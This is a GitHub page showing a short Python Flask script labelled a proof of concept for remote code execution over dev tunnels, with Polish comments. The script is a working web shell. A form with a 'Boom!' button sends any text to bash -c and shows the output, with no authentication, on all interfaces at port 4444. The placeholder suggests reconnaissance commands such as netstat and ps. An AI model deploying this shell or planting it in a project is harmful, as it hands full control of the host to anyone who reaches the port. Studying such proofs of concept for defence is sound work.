-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathcli_sh1.py
More file actions
51 lines (43 loc) · 1.48 KB
/
cli_sh1.py
File metadata and controls
51 lines (43 loc) · 1.48 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from flask import Flask, request, redirect, url_for
import subprocess, locale, shlex
app = Flask(__name__)
# globalny bufor "pseudo-terminala"
history = []
@app.route("/")
def index():
# render historii jako pseudo-CLI
output = "\n".join(history)
return f"""
<h2>POC devtunnels RCE (Linux)</h2>
<form method="post" action="/run">
<input type="text" name="cmd" placeholder="netstat -antup && ps uax" style="width:400px;">
<input type="submit" value="Boom!"
</form>
<div style="border:1px solid #ccc; padding:10px; margin-top:10px;
font-family: monospace; white-space: pre-wrap;
height:600px; overflow-y:scroll; background:#111; color:#0f0;">
{output}
</div>
"""
@app.route("/run", methods=["POST"])
def run_cmd():
cmd = request.form.get("cmd", "").strip()
if not cmd:
return redirect(url_for("index"))
try:
# odpalenie przez bash -c
result = subprocess.run(
["/bin/bash", "-c", cmd],
capture_output=True
)
enc = locale.getpreferredencoding()
stdout = result.stdout.decode(enc, errors="replace")
stderr = result.stderr.decode(enc, errors="replace")
output = stdout + stderr
except Exception as e:
output = f"Exception: {e}"
# dodajemy do historii
history.append(f"$ {cmd}\n{output}")
return redirect(url_for("index"))
if __name__ == "__main__":
app.run(debug=False, host="0.0.0.0", port=4444)